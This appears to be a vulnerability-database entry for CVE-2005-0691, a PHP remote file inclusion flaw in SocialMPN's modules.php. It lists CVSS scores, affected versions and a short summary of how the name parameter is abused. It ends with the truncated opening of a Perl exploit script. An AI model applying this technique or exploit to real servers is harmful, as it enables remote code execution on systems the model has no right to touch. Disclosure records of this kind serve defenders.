7.5
CVSSv2

CVE-2005-0691

Published: 06/03/2005 Updated: 18/10/2016
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in article mode for modules.php in SocialMPN allows remote malicious users to execute arbitrary PHP code by modifying the name parameter to reference a URL on a remote web server that contains the code.

Vulnerable Product Search on Vulmon Subscribe to Product

socialmpn socialmpn 1.2.3

socialmpn socialmpn 1.2.4

socialmpn socialmpn 1.2.5

socialmpn socialmpn 1.2.1

socialmpn socialmpn 1.2.2

Exploits

#!/usr/bin/perl -w # Remote Testing SocialMPN Remote File Inclusion by y3dips [for testing only] # Bug find by zer0-c00l , # Bug published at waraxeus/ftopic-542-0-days0-orderasc-html print " * Remote Testing File Inclusion for SocialMPN by y3dips *\n"; require LWP::UserAgent; if(@ARGV == 2) { $target= $ARGV[0]; $xploit ...